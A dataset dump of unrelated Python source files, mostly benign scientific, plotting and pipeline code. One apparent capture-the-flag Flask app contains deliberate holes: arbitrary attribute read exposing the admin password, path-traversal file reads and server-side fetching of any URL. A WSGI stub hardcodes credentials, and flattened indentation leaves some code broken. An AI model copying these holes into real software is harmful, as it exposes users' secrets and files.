id (stringlengths 1–265) | text (stringlengths 6–5.19M) | dataset_id (stringclasses, 7 values)
---|---|---|
1642309 | import csv
import json
import os
import matplotlib.pyplot as plt
import commonfunctions as cf
import matplotlib as mpl
root_directory = os.path.abspath(os.path.dirname(os.path.abspath(os.curdir)))
directory = os.path.join(root_directory, cf.working_directory)
with open('sentiment-time-winnerloser.json', 'r') as f:
data = json.load(f)
w = [datum['year_results'] for datum in data if datum['winnerloser'] == 'w'][0]
print(w)
l = [datum['year_results'] for datum in data if datum['winnerloser'] == 'l'][0]
print(l)
winnerPositiveData = [(x['year'], x['positive'], x['word_count']) for x in w]
winnerNegativeData = [(x['year'], x['negative'], x['word_count']) for x in w]
loserPositiveData = [(x['year'], x['positive'], x['word_count']) for x in l]
loserNegativeData = [(x['year'], x['negative'], x['word_count']) for x in l]
# def weighted_average(list_of_tuples):
# assert type(list_of_tuples) == list
# assert not [True for item in list_of_tuples if type(item) != tuple]
# total = 0
# total_weights = 0
# for tuple_ in list_of_tuples:
# amount, weight = tuple_
# total += amount * weight
# total_weights += weight
# return total / total_weights
#
#
# years = list(set([x['year'] for x in w]).union([x['year'] for x in l]))
# years.sort()
#
# winnerPositiveData = []
# winnerNegativeData = []
# loserNegativeData = []
# loserPositiveData = []
#
# for year in years:
# winnerPositiveData.append(
# (year, weighted_average([(x[1], x[2]) for x in winnerPositiveData2 if x[0] == year])))
# winnerNegativeData.append(
# (year, weighted_average([(x[1], x[2]) for x in winnerNegativeData2 if x[0] == year])))
# loserPositiveData.append(
# (year, weighted_average([(x[1], x[2]) for x in loserPositiveData2 if x[0] == year])))
# loserNegativeData.append(
# (year, weighted_average([(x[1], x[2]) for x in loserNegativeData2 if x[0] == year])))
#
# print loserNegativeData
# # This bit writes to a file. Useful if you want a table of results
# with open('winnerloserDebug.csv', 'w') as f:
# dw = csv.DictWriter(f, w[0].keys())
# csv.writer(f, ['Sentiment in Republican Debates'])
# dw.writeheader()
# dw.writerows(w)
# csv.writer(f, ['Sentiment in Democrat Debates'])
# dw.writeheader()
# dw.writerows(l)
plt.style.use('ggplot')
fig = plt.figure(0)
ax = fig.gca()
ax.grid(False)
ax.set_facecolor('white')
labels = ['Winners', 'Losers']
colors = ['#7fbf7b', '#af8dc3']
for labelno, data in enumerate([winnerNegativeData, loserNegativeData]):
    data2 = list(zip(*data))
ax.plot(data2[0], data2[1], color=colors[labelno], label=labels[labelno], lw=2.5)
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Proportion of words in dictionary of negative words')
ax.set_title('Negative Sentiment over time in US election debates, split by winners and losers',
fontdict={'fontsize': 13,
'fontweight': mpl.rcParams['axes.titleweight'],
'verticalalignment': 'baseline',
'horizontalalignment': 'center'},
y=1.05)
plt.savefig(os.path.join(root_directory, 'images', 'analysis-sentiment-time-winnerloser-negative.svg'), format='svg')
fig = plt.figure(1)
ax = fig.gca()
ax.grid(False)
ax.set_facecolor('white')
for labelno, data in enumerate([winnerPositiveData, loserPositiveData]):
    data2 = list(zip(*data))
    print(data2)
ax.plot(data2[0], data2[1], color=colors[labelno], label=labels[labelno], lw=2.5)
ax.legend()
ax.set_xlabel('Year')
ax.set_ylabel('Proportion of words in dictionary of positive words')
ax.set_title('Positive Sentiment over time in US election debates, split by winners and losers',
fontdict={'fontsize': 13,
'fontweight': mpl.rcParams['axes.titleweight'],
'verticalalignment': 'baseline',
'horizontalalignment': 'center'},
y=1.05)
plt.savefig(os.path.join(root_directory, 'images', 'analysis-sentiment-time-winnerloser-positive.svg'), format='svg')
| StarcoderdataPython |
161337 | # this code is just an example from 2018, just lies /
from flask import Flask, request, render_template, abort
import os, requests
app = Flask(__name__)
class user:
def __init__(self, username, password):
self.username = username
self.__password = password
self.files = []
def getPass(self):
return self.__password
users = {}
users["admin"] = user("admin", os.environ["FLAG"])
def custom500(error):
return str(error), 500
@app.route("/", methods=["GET", "POST"])
def mainpage():
if request.method == "POST":
if request.form["action"] == "Login":
if request.form["username"] in users:
if request.form["password"] == users[request.form["username"]].getPass():
return render_template("index.html", user=users[request.form["username"]])
return "wrong password"
return "user does not exist"
elif request.form["action"] == "Signup":
if request.form["username"] not in users:
users[request.form["username"]] = user(request.form["username"], request.form["password"])
return render_template("index.html", user=users[request.form["username"]])
else:
return "user already exists"
elif request.form["action"] == "Add File":
return addfile()
return render_template("loggedout.html")
#beta feature for viewing info about other users - still testing
@app.route("/user/<username>", methods=['POST'])
def getInfo(username):
val = getattr(users[username], request.form['field'], None)
if val != None: return val
else: return "error"
@app.route("/files/<path:file>", methods=["GET"])
def getFile(file):
if "index.py" in file:
return "no! bad user! bad!"
return open(file, "rb").read()
def addfile():
if users[request.form["username"]].getPass() == request.form["password"]:
if request.form['url'][-1] == "/": downloadurl = request.form['url'][:-1]
else: downloadurl = request.form['url']
if downloadurl.split("/")[-1] in os.listdir("."):
return "file already exists"
file = requests.get(downloadurl, stream=True)
f = open(downloadurl.split("/")[-1], "wb")
first = True
for chunk in file.iter_content(chunk_size=1024*512):
if not first: break
f.write(chunk)
first = False
f.close()
users[request.form["username"]].files.append(downloadurl.split("/")[-1])
return render_template("index.html", user=users[request.form["username"]])
return "bad password"
if __name__ == "__main__": app.run(host="0.0.0.0")
| StarcoderdataPython |
136688 | <filename>mne/preprocessing/nirs/_beer_lambert_law.py
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD (3-clause)
import os.path as op
import re as re
import numpy as np
from scipy import linalg
from ...io import BaseRaw
from ...io.pick import _picks_to_idx
from ...io.constants import FIFF
from ...utils import _validate_type
from ..nirs import source_detector_distances
def beer_lambert_law(raw, ppf=0.1):
r"""Convert NIRS optical density data to haemoglobin concentration.
Parameters
----------
raw : instance of Raw
The optical density data.
ppf : float
The partial pathlength factor.
Returns
-------
raw : instance of Raw
The modified raw instance.
"""
raw = raw.copy().load_data()
_validate_type(raw, BaseRaw, 'raw')
freqs = np.unique(_channel_frequencies(raw))
picks = _check_channels_ordered(raw, freqs)
abs_coef = _load_absorption(freqs)
distances = source_detector_distances(raw.info)
for ii in picks[::2]:
EL = abs_coef * distances[ii] * ppf
iEL = linalg.pinv(EL)
raw._data[[ii, ii + 1]] = (raw._data[[ii, ii + 1]].T @ iEL.T).T * 1e-3
# Update channel information
coil_dict = dict(hbo=FIFF.FIFFV_COIL_FNIRS_HBO,
hbr=FIFF.FIFFV_COIL_FNIRS_HBR)
for ki, kind in enumerate(('hbo', 'hbr')):
ch = raw.info['chs'][ii + ki]
ch.update(coil_type=coil_dict[kind], unit=FIFF.FIFF_UNIT_MOL)
raw.rename_channels({
ch['ch_name']: '%s %s' % (ch['ch_name'][:-4], kind)})
return raw
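# Example usage (illustrative sketch, not part of the original module). It assumes an
# existing `raw_intensity` mne.io.Raw object containing fNIRS intensity channels;
# `optical_density` is the standard MNE helper that produces the optical density data
# expected by `beer_lambert_law` above.
#
#     from mne.preprocessing.nirs import optical_density
#     raw_od = optical_density(raw_intensity)        # raw intensity -> optical density
#     raw_haemo = beer_lambert_law(raw_od, ppf=0.1)  # od channel pairs become hbo/hbr channels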
def _channel_frequencies(raw):
"""Return the light frequency for each channel."""
picks = _picks_to_idx(raw.info, 'fnirs_od')
freqs = np.empty(picks.size, int)
for ii in picks:
freqs[ii] = raw.info['chs'][ii]['loc'][9]
return freqs
def _check_channels_ordered(raw, freqs):
"""Check channels followed expected fNIRS format."""
# Every second channel should be same SD pair
# and have the specified light frequencies.
picks = _picks_to_idx(raw.info, 'fnirs_od')
for ii in picks[::2]:
ch1_name_info = re.match(r'S(\d+)_D(\d+) (\d+)',
raw.info['chs'][ii]['ch_name'])
ch2_name_info = re.match(r'S(\d+)_D(\d+) (\d+)',
raw.info['chs'][ii + 1]['ch_name'])
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(int(ch1_name_info.groups()[2]) != freqs[0]) or \
(int(ch2_name_info.groups()[2]) != freqs[1]):
raise RuntimeError('NIRS channels not ordered correctly')
return picks
def _load_absorption(freqs):
"""Load molar extinction coefficients."""
# Data from https://omlc.org/spectra/hemoglobin/summary.html
# The text was copied to a text file. The text before and
    # after the table was deleted. Then the following was run in
# matlab
# extinct_coef=importdata('extinction_coef.txt')
# save('extinction_coef.mat', 'extinct_coef')
#
# Returns data as [[HbO2(freq1), Hb(freq1)],
# [HbO2(freq2), Hb(freq2)]]
from scipy.io import loadmat
from scipy.interpolate import interp1d
extinction_fname = op.join(op.dirname(__file__), '..', '..', 'data',
'extinction_coef.mat')
a = loadmat(extinction_fname)['extinct_coef']
interp_hbo = interp1d(a[:, 0], a[:, 1], kind='linear')
interp_hb = interp1d(a[:, 0], a[:, 2], kind='linear')
ext_coef = np.array([[interp_hbo(freqs[0]), interp_hb(freqs[0])],
[interp_hbo(freqs[1]), interp_hb(freqs[1])]])
abs_coef = ext_coef * 0.2303
return abs_coef
| StarcoderdataPython |
1745890 | <reponame>vivin-christy/ud-catalog
import sys
sys.path.insert(0, '/var/www/catalog')
from catalog import app as application
application.secret_key = 'New secret key. Change it on server'
application.config['SQLALCHEMY_DATABASE_URI'] = (
'postgresql://'
'catalog:password@localhost/catalog')
| StarcoderdataPython |
161645 | # -*- coding: utf-8 -*-
"""Implementation of the ``repeat_analysis`` step
The ``repeat_analysis`` step takes as the input the results of the ``ngs_mapping`` step
(aligned reads in BAM format) and performs repeat expansion analysis. The result are variant files
(VCF) with the repeat expansions definitions, and associated annotations (JSON).
==========
Stability
==========
This step is considered experimental, use it at your own discretion.
==========
Step Input
==========
The repeat analysis step uses Snakemake sub workflows for using the result of the ``ngs_mapping``
step.
===========
Step Output
===========
For all samples, repeat analysis will be performed on the primary DNA NGS libraries separately for
each configured read mapper and repeat analysis tool. The name of the primary DNA NGS library will
be used as an identification token in the output file.
For each read mapper, repeat analysis tool, and sample, the following files will be generated:
- ``{mapper}.{repeat_tool}.{lib_name}.vcf``
- ``{mapper}.{repeat_tool}.{lib_name}.vcf.md5``
- ``{mapper}.{repeat_tool}_annotated.{lib_name}.json``
- ``{mapper}.{repeat_tool}_annotated.{lib_name}.json.md5``
For example, it might look as follows for the example from above:
::
output/
+-- bwa.expansionhunter.P001-N1-DNA1-WES1
| `-- out
| |-- bwa.expansionhunter.P001-N1-DNA1-WES1.vcf
| |-- bwa.expansionhunter.P001-N1-DNA1-WES1.vcf.md5
+-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1
| `-- out
| |-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1.json
| |-- bwa.expansionhunter_annotated.P001-N1-DNA1-WES1.json.md5
[...]
====================
Global Configuration
====================
Not applicable.
=====================
Default Configuration
=====================
The default configuration is as follows:
.. include:: DEFAULT_CONFIG_repeat_expansion.rst
===============================
Available Repeat Analysis Tools
===============================
The following germline repeat analysis tool is currently available:
- ``"ExpansionHunter"``
==================
Parallel Execution
==================
Not available.
"""
from collections import OrderedDict
import os
from biomedsheets.shortcuts import KEY_SEX, GermlineCaseSheet, is_not_background
from snakemake.io import expand
from snappy_pipeline.base import UnsupportedActionException
from snappy_pipeline.utils import dictify, listify
from snappy_pipeline.workflows.abstract import BaseStep, BaseStepPart, LinkOutStepPart
from snappy_pipeline.workflows.ngs_mapping import NgsMappingWorkflow
from snappy_pipeline.workflows.repeat_expansion.annotate_expansionhunter import (
AnnotateExpansionHunter,
)
#: Extensions of files to create as main payload - JSON.
EXT_JSON = (".json", ".json.md5")
#: Extensions of files to create as main payload - VCF.
EXT_VCF = (".vcf", ".vcf.md5")
#: Default configuration for the repeat_expansion step.
DEFAULT_CONFIG = r"""
# Default configuration repeat_expansion
step_config:
repeat_expansion:
# Repeat expansions definitions - used in ExpansionHunter call
repeat_catalog: REQUIRED
# Repeat expansions annotations, e.g., normality range - custom file
repeat_annotation: REQUIRED
# Path to the ngs_mapping step
path_ngs_mapping: ../ngs_mapping
"""
class ExpansionHunterStepPart(BaseStepPart):
"""Repeat expansion analysis with Illumina::ExpansionHunter"""
#: Step name.
name = "expansionhunter"
#: Valid actions.
actions = ("run", "annotate")
def __init__(self, *args, **kwargs):
"""Constructor."""
super().__init__(*args, **kwargs)
#: Build shortcut from library name to sex
self.library_name_to_sex = OrderedDict()
for sheet in self.parent.shortcut_sheets:
self.library_name_to_sex.update(self._library_name_to_sex(sheet))
@staticmethod
def _library_name_to_sex(sheet):
"""Library name to sex.
:param sheet: Sample sheet.
:type sheet: biomedsheets.shortcuts.GermlineCaseSheet
:return: Yields (library name, sex).
"""
for donor in sheet.donors:
sex = donor.extra_infos.get(KEY_SEX)
for bio_sample in donor.bio_samples.values():
for test_sample in bio_sample.test_samples.values():
for ngs_library in test_sample.ngs_libraries.values():
yield ngs_library.name, sex
def get_input_files(self, action):
"""Return input function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns input function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
# Return requested function
return getattr(self, "_get_input_files_{}".format(action))
def get_output_files(self, action):
"""Return output function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns output function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
return getattr(self, "_get_output_files_{}".format(action))()
def get_log_file(self, action):
"""Return log function for ExpansionHunter rules.
:param action: Action (i.e., step) in the workflow.
:type action: str
:return: Returns log function for ExpansionHunter rule based on inputted action.
:raises UnsupportedActionException: if action not in class defined list of valid actions.
"""
# Validate inputted action
if action not in self.actions:
valid_actions_str = ", ".join(self.actions)
error_message = "Action '{action}' is not supported. Valid options: {options}".format(
action=action, options=valid_actions_str
)
raise UnsupportedActionException(error_message)
return getattr(self, "_get_log_files_{}".format(action))()
@listify
def _get_input_files_run(self, wildcards):
"""Yield BAM files based on subworkflow `ngs_mapping` results.
:param wildcards: Snakemake rule wildcards.
:type wildcards: snakemake.io.Wildcards
"""
ngs_mapping = self.parent.sub_workflows["ngs_mapping"]
bam_tpl = "output/{mapper}.{library_name}/out/{mapper}.{library_name}.bam"
yield ngs_mapping(bam_tpl.format(**wildcards))
@staticmethod
@listify
def _get_input_files_annotate(_wildcards):
"""Yield input files' pattern for rule `annotate` - based on ExpansionHunter call results.
:param _wildcards: Snakemake rule wildcards (unused).
:type _wildcards: snakemake.io.Wildcards
"""
name_pattern = "{mapper}.expansionhunter.{library_name}"
yield "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext="json"
)
@staticmethod
@dictify
def _get_output_files_run():
"""Yield output files' patterns for rule `run` - ExpansionHunter call."""
# Initialise variables
name_pattern = "{mapper}.expansionhunter.{library_name}"
ext_dict = {"json": "json", "vcf": "vcf", "vcf_md5": "vcf.md5"}
# Yield
for key, ext in ext_dict.items():
yield key, "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext=ext
)
@staticmethod
@dictify
def _get_output_files_annotate():
"""Yield output files' patterns for rule `annotate`."""
# Initialise variables
name_pattern = "{mapper}.expansionhunter_annotated.{library_name}"
ext_dict = {"json": "json", "json_md5": "json.md5"}
# Yield
for key, ext in ext_dict.items():
yield key, "work/{name_pattern}/out/{name_pattern}.{ext}".format(
name_pattern=name_pattern, ext=ext
)
@staticmethod
def _get_log_files_run():
"""
:return: Returns log file pattern for rule `run` - ExpansionHunter call.
"""
name_pattern = "{mapper}.expansionhunter.{library_name}"
return "work/{name_pattern}/log/{name_pattern}.log".format(name_pattern=name_pattern)
def get_params(self, action):
"""Get parameters.
:param action: Action, i.e., step being performed.
:type action: str
:return: Returns method to get donor's sex.
"""
assert action == "run", "Parameters is only available for action 'run'."
return self._get_donor_sex
def _get_donor_sex(self, wildcards):
"""Get donor's sex.
:param wildcards: Snakemake wildcards associated with rule (unused).
:type wildcards: snakemake.io.Wildcards
:return: Returns donor's sex as found in sample sheet: 'female', 'male' or 'unknown'.
"""
return {"sex": self.library_name_to_sex[wildcards.library_name]}
def annotate_results(self, _wildcards, sm_input, sm_output):
"""Annotate/Explain ExpansionHunter results.
:param _wildcards: Snakemake wildcards associated with rule (unused).
:type _wildcards: snakemake.io.Wildcards
:param sm_input: Snakemake input associated with rule.
:type sm_input: snakemake.io.Namedlist
:param sm_output: Snakemake output associated with rule.
:type sm_output: snakemake.io.Namedlist
"""
# Absolute path from input and output
input_path = os.path.join(os.getcwd(), str(sm_input))
output_path = os.path.join(os.getcwd(), sm_output.json)
# Annotate
AnnotateExpansionHunter(
eh_json=input_path,
annotation_json=self.config["repeat_annotation"],
output_path=output_path,
).run()
class RepeatExpansionWorkflow(BaseStep):
"""Perform germline repeat expansion analysis."""
#: Workflow name
name = "repeat_expansion"
#: Sample sheet shortcut class
sheet_shortcut_class = GermlineCaseSheet
def __init__(
self, workflow, config, cluster_config, config_lookup_paths, config_paths, workdir
):
super().__init__(
workflow,
config,
cluster_config,
config_lookup_paths,
config_paths,
workdir,
(NgsMappingWorkflow,),
)
# Register sub step classes so the sub steps are available
self.register_sub_step_classes((LinkOutStepPart, ExpansionHunterStepPart))
# Register sub workflows
self.register_sub_workflow("ngs_mapping", self.config["path_ngs_mapping"])
@classmethod
def default_config_yaml(cls):
"""Return default config YAML, to be overwritten by project-specific one"""
return DEFAULT_CONFIG
@listify
def _all_donors(self, include_background=True):
"""Return list of all donors in sample sheet."""
sheets = self.shortcut_sheets
if not include_background:
sheets = list(filter(is_not_background, sheets))
for sheet in sheets:
for pedigree in sheet.cohort.pedigrees:
yield from pedigree.donors
@listify
def get_result_files(self):
"""Return list of result files for the germline repeat expansion analysis workflow."""
# Initialise variable
tools = ("expansionhunter",)
# Yield the JSON annotated results files
name_pattern = "{mapper}.{tool}_annotated.{donor.dna_ngs_library.name}"
yield from self._yield_result_files(
os.path.join("output", name_pattern, "out", name_pattern + "{ext}"),
mapper=self.w_config["step_config"]["ngs_mapping"]["tools"]["dna"],
tool=tools,
ext=EXT_JSON,
)
# Yield the VCF results files
name_pattern = "{mapper}.{tool}.{donor.dna_ngs_library.name}"
yield from self._yield_result_files(
os.path.join("output", name_pattern, "out", name_pattern + "{ext}"),
mapper=self.w_config["step_config"]["ngs_mapping"]["tools"]["dna"],
tool=tools,
ext=EXT_VCF,
)
def _yield_result_files(self, tpl, **kwargs):
"""Build output paths from path template and extension list."""
for donor in self._all_donors(include_background=False):
if donor.dna_ngs_library: # ignores samples without DNA library
yield from expand(tpl, donor=[donor], **kwargs)
def check_config(self):
"""Check that the necessary configuration is available for the step"""
# Requires path to ngs_mapping output, i.e., the BAM files
self.ensure_w_config(
config_keys=("step_config", "repeat_expansion", "path_ngs_mapping"),
msg="Path to NGS mapping not configured but required for repeat expansion analysis.",
)
# Requires path to reference genome FASTA
self.ensure_w_config(
config_keys=("static_data_config", "reference", "path"),
msg=(
"Path to reference FASTA not configured but required "
"for repeat expansion analysis."
),
)
| StarcoderdataPython |
101184 | from flask import Flask, render_template
from subprocess import call
app = Flask(__name__)
SENDER_CONFIG = '10101'
SEND_CONFIG = ['-u', '-s']
RECEIVER = {
'A': '1',
'B': '2',
'C': '3',
'D': '4',
}
STATES = {
'on':'1',
'off':'0'
}
def send_signal(receiver, state):
call(['./send', SENDER_CONFIG, *SEND_CONFIG, receiver, state])
@app.route('/')
def index():
return render_template('index.html')
@app.route('/on/', methods=['POST'])
def on_all():
for _, value in RECEIVER.items():
send_signal(value, STATES['on'])
return 'all on'
@app.route('/off/', methods=['POST'])
def off_all():
for _, value in RECEIVER.items():
send_signal(value, STATES['off'])
return 'all off'
@app.route('/receiver/<receiver_id>/<state_id>/', methods=['POST'])
def switch(receiver_id, state_id):
if receiver_id not in RECEIVER.keys():
return '{} not in {}'.format(receiver_id, RECEIVER.keys()), 400
elif state_id not in STATES.keys():
return '{} not in {}'.format(state_id, STATES.keys()), 400
else:
send_signal(RECEIVER[receiver_id], STATES[state_id])
return '{} {}'.format(receiver_id, state_id)
| StarcoderdataPython |
20978 | import csv
import json
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
formats = ['png', 'pdf', 'svg', 'eps']
metrics = [
{'gmetric': 'groc', 'lmetric': 'lroc', 'metric': 'AUC'},
{'gmetric': 'gauc', 'lmetric': 'lauc', 'metric': 'PRAUC'},
]
datasets = [
{'name': 'HCC', 'file': '../../results/evaluation/hcc_multi_sites_100_each.csv'},
{'name': 'ILPD', 'file': '../../results/evaluation/ilpd_multi_sites_100_each.csv'},
{'name': 'LTD', 'file': '../../results/evaluation/tumor_multi_sites_100_each.csv'},
{'name': 'BCD', 'file': '../../results/evaluation/diag_multi_sites_100_each.csv'},
]
for metric in metrics:
gmetric = metric['gmetric']
lmetric = metric['lmetric']
metric = metric['metric']
for ds in datasets:
file = ds['file']
name = ds['name']
title = f'{name} | Multiple Local Models'
stats = {}
xs = ['1', '2', '5', '10', '20', '50', '100']
with open(file, newline='') as csvfile:
data = csv.reader(csvfile, delimiter=';')
headers = next(data)
gauc_idx = headers.index(gmetric)
lauc_idx = headers.index(lmetric)
for row in data:
stat = stats.get(row[1])
if not stat:
stat = {
gmetric: [],
lmetric: [],
}
stats[row[1]] = stat
# xs.append(row[1])
gvals = json.loads(row[gauc_idx])
lvals = json.loads(row[lauc_idx])
stat[gmetric].append(gvals)
if len(lvals) > 0:
stat[lmetric].extend(lvals)
else:
stat[lmetric].append(gvals)
# datainfo = str(len(stats['100'][gmetric]))
# title += ' | ' + datainfo
y_gauc_median = [np.median(stats[x][gmetric]) for x in xs]
y_gauc_q25 = [np.quantile(stats[x][gmetric], 0.25) for x in xs]
y_gauc_q75 = [np.quantile(stats[x][gmetric], 0.75) for x in xs]
y_lauc_median = [np.median(stats[x][lmetric]) for x in xs]
y_lauc_q25 = [np.quantile(stats[x][lmetric], 0.25) for x in xs]
y_lauc_q75 = [np.quantile(stats[x][lmetric], 0.75) for x in xs]
xs = [int(x) for x in xs]
regular_col = '#b0b0b0'
global_col = '#424ef5'
local_col = '#f57542'
alpha_mean = 1.0
alpha_q = 0.25
alpha_area = 0.2
fig = plt.figure(figsize=(6, 4.5))
ax = fig.add_subplot()
ax.hlines(y_gauc_q25[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.hlines(y_gauc_median[0], 1, 100, label='Centralized', colors=[regular_col])
ax.hlines(y_gauc_q75[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.fill_between(xs, y_gauc_q25, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_gauc_q75, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q25, y_lauc_median, color=local_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q75, y_lauc_median, color=local_col, alpha=alpha_area)
ax.plot(xs, y_gauc_q25, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_gauc_median, '.', label='Combined', color=global_col, alpha=alpha_mean)
ax.plot(xs, y_gauc_q75, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_lauc_q25, '_', color=local_col, alpha=alpha_q)
ax.plot(xs, y_lauc_median, '.', label='Local', color=local_col, alpha=alpha_mean)
ax.plot(xs, y_lauc_q75, '_', color=local_col, alpha=alpha_q)
plt.yticks([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
plt.xscale('log')
plt.xticks([1, 2, 5, 10, 20, 50, 100], ['Centralized', '2', '5', '10', '20', '50', '100'])
plt.ylabel(metric)
plt.xlabel('Number of Sites')
plt.legend()
plt.title(title)
for format in formats:
plt.savefig(f'../../results/plots/{name}_{metric}_sites.{format}', format=format, bbox_inches='tight')
| StarcoderdataPython |
1739707 |
class LaplaceSmoother(object):
'''
    Add-delta smoothing algorithm module
'''
def __init__(self, delta=1):
self.delta = delta
def smooth(self, counter, words):
'''
        return P(w_n | w_1, w_2, ... w_n-1) = (C(w_1, w_2, ... w_n) + delta) / (C(w_1, w_2, ... w_n-1) + |V| * delta).
        when C(w_1, w_2, ... w_n-1) is zero, the model backs off and P(w_n | w_1, w_2, ... w_n-2) is used instead.
'''
query = words[:-1]
befores = counter.search(query)
if len(befores) == 0:
return self.smooth(counter, query)
try:
b = counter.search(words)
count = b["count"]
except:
count = 0
count += self.delta
return count / (befores["count"] + self.delta * befores["child_num"])
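# Example usage (illustrative sketch, not part of the original module). It assumes a
# hypothetical `counter` object whose .search(words) method returns a dict with
# "count" and "child_num" keys, which is what smooth() above relies on:
#
#     smoother = LaplaceSmoother(delta=1)
#     # smoothed probability of "dog" given the context ("the",); unseen n-grams get a
#     # small non-zero probability instead of zero
#     p = smoother.smooth(counter, ("the", "dog"))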
| StarcoderdataPython |
3210924 | <reponame>PeterWolf93/PupilLabs_VR_Calibration<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 07:26:07 2018
@author: <NAME>
title: start_calib
"""
#%% Imports
import numpy as np
from calib_main import calib_main
from load_pickle import load_pickle
#%% Version number
version_num = 'V9'
#%% data path
directory = 'F:\\Arbeit und Uni\\MasterArbeit\\'
# path to the pupil capture data
data_directory = directory + 'Pupil_VR_Recordings\\'
# path to the calibration data from the stimulus script
time_directory = directory + 'HTC_Vive_Recs\\Data\\'
#%% Configurations
disp_plots = 1
# 1. uncalibrated data; 2. GT after calibration
disp_what = [1, 1, 0]
# atm calculated data can't be saved
save_data = 0
# forst check the save directory for the plots
save_plots = 0
#%% choose data set
choose_dataset = 0
if choose_dataset == 0:
# specify the recording you want to calibrate
subj_name = 'olbe'
file_date = '2018_11_20'
file_num = '001'
# capture frequency in Hz
set_fps = 120
# left; right; both
use_eye = 'both'
#%% load calibration times from pickle file
mask_ind_cal,mask_ind_val = load_pickle(time_directory,subj_name,file_date,file_num)
#%% extract calibration grid
gt_px = mask_ind_cal[:,3:5]
#%% specify dots for calibration and validation
cal_dots = np.linspace(1,np.size(gt_px,0),np.size(gt_px,0));
val_dots = np.linspace(1,np.size(gt_px,0),np.size(gt_px,0));
#%% choose coefficents for design matrix
choose_coeff = 1
if choose_coeff == 1:
coeff_num_all = 6
cal_form_all_x = [['1','x','y','x^2','y^2','x*y']]
cal_form_all_y = [['1','x','y','x^2','y^2','x*y']]
cal_form_all = [cal_form_all_x, cal_form_all_y]
#%% screen resolutions
screen_width = np.nan
screen_height = np.nan
screen_dist = 1
#%% shorten input data and configs
class CalibConfig(object):
def __init__(self, disp_plots, disp_what, save_data, save_plots):
self.disp_plots = disp_plots
self.disp_what = disp_what
self.save_data = save_data
self.save_plots = save_plots
fct_cfg = CalibConfig(disp_plots, disp_what, save_data, save_plots)
class CalibInputValue(object):
def __init__(self, coeff_num_all, cal_form_all, version_num, data_directory,
time_directory, subj_name, file_date, file_num, mask_ind_cal,
mask_ind_val, cal_dots, val_dots, gt_px, set_fps, use_eye):
self.coeff_num_all = coeff_num_all
self.cal_form_all = cal_form_all
self.version_num = version_num
self.data_directory = data_directory
self.time_directory = time_directory
self.subj_name = subj_name
self.file_date = file_date
self.file_num = file_num
self.mask_ind_cal = mask_ind_cal
self.mask_ind_val = mask_ind_val
self.cal_dots = cal_dots
self.val_dots = val_dots
self.gt_px = gt_px
self.set_fps = set_fps
self.use_eye = use_eye
fct_in = CalibInputValue(coeff_num_all, cal_form_all, version_num, data_directory,
time_directory, subj_name, file_date, file_num, mask_ind_cal,
mask_ind_val, cal_dots, val_dots, gt_px, set_fps, use_eye)
class ScreenConfig(object):
def __init__(self, screen_width, screen_height, screen_dist):
self.screen_width = screen_width
self.screen_height = screen_height
self.screen_dist = screen_dist
screen_cfg = ScreenConfig(screen_width, screen_height, screen_dist)
#%% Output
fct_out = calib_main(fct_cfg,fct_in,screen_cfg) | StarcoderdataPython |
3312641 | <gh_stars>0
#!/usr/bin/python3
# parse.py
#
# <NAME> 28-Dec-2021
#
# Copyright (C) Randix LLC. All rights reserved.
#
# This reads from the serial port and parses the data from the
# microwizard.com Fast Track Model K2
#
# output the raw data to the file "raw.log"
# output the parsed data to "times.csv"
import os
import serial
import time
ser = None
#serialPort = '/dev/tty.usbserial-110' # macOS 12.1
serialPort = '/dev/ttyUSB0' # linux RPi
raw = None # file descriptor
rawLog = 'raw.log'
# display character, and get to disk
def display(c):
raw.write(c)
raw.flush() # push the char to the OS
os.fsync(raw) # push to disk
print(c, end='')
if c == '>':
print()
def initSerial():
global raw, ser
# Open Serial Port
try:
ser = serial.Serial(port=serialPort,
baudrate=9600,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS)
raw = open(rawLog, 'a')
return True
except:
print('No serial port!')
return False
def parseTrack(track):
timeVal = float(track.split('=')[1][:6])
if len(track) > 8: # we have a time and place
place = track[8]
else:
place = '0' # no place
if place == '!':
place = '1'
elif place == '"':
place = '2'
elif place == '#':
place = '3'
elif place == '$':
place = '4'
return place, timeVal
def parseSerial(trackCars):
#print(trackCars)
line = ''
c = ''
ready = False
while not ready:
# Get the timer output
while ser.inWaiting() > 0:
c = ser.read(1).decode('utf-8')
display(c)
if c == '@' or c == '>':
continue
line += c
if c == '\r':
ready = True
break
#print('Parse...', line)
tracks = line.split()
line = ''
c = ''
#print(tracks, len(tracks))
result = []
for i in range(len(trackCars)):
place, timeVal = parseTrack(tracks[i])
print(i, place, timeVal)
